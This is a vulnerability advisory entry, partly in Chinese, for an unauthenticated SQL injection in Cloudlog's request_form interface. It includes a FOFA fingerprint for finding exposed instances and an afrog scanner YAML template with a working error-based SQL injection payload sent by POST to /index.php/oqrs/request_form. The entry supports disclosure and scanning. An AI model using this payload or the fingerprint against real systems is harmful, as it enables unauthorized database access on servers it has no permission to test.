cloudlog-request-form-sqli: Cloudlog Request_form SQL Injection

日期: 2025-09-01 | 影响软件: Cloudlog Request form | POC: 已公开

漏洞描述

Cloudlog system has an unauthenticated SQL injection vulnerability in the request_form interface. Attackers can exploit this vulnerability to extract information from the database. FOFA: icon_hash="-460032467"

PoC代码[已公开]

id: cloudlog-request-form-sqli
info:
  name: Cloudlog Request_form SQL Injection
  author: ZacharyZcR
  severity: high
  verified: true
  description: |
    Cloudlog system has an unauthenticated SQL injection vulnerability in the request_form interface.
    Attackers can exploit this vulnerability to extract information from the database.
    FOFA: icon_hash="-460032467"
  reference:
    - https://github.com/wy876/POC/blob/main/Cloudlog/Cloudlog%E7%B3%BB%E7%BB%9Frequest_form%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  tags: cloudlog,sqli
  created: 2024/12/31

rules:
  r0:
    request:
      method: POST
      path: /index.php/oqrs/request_form
      body: station_id=1 AND (SELECT 2469 FROM(SELECT COUNT(*),CONCAT(0x7162716b71,(SELECT (ELT(2469=2469,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    expression: response.status == 500 && response.body.bcontains(b'qbqkq1qbqkq1')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/cloudlog-request-form-sqli.yaml

相关漏洞推荐